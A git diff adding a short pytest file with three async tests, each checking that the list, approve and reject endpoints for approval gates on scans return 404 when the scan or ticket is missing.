diff --git a/packages/web/backend/tests/test_gate_routes.py b/packages/web/backend/tests/test_gate_routes.py
new file mode 100644
index 0000000..b63e9b4
--- /dev/null
+++ b/packages/web/backend/tests/test_gate_routes.py
@@ -0,0 +1,24 @@
+"""Tests for approval gate API routes."""
+import pytest
+from httpx import AsyncClient
+
+
+@pytest.mark.asyncio
+async def test_list_gates_missing_scan(auth_client: AsyncClient):
+    resp = await auth_client.get("/api/v1/scans/nonexistent/gates")
+    assert resp.status_code == 404
+
+
+@pytest.mark.asyncio
+async def test_approve_missing_ticket(auth_client: AsyncClient):
+    resp = await auth_client.post("/api/v1/scans/scan-1/gates/nonexistent/approve")
+    assert resp.status_code == 404
+
+
+@pytest.mark.asyncio
+async def test_reject_missing_ticket(auth_client: AsyncClient):
+    resp = await auth_client.post(
+        "/api/v1/scans/scan-1/gates/nonexistent/reject",
+        json={"reason": "test"},
+    )
+    assert resp.status_code == 404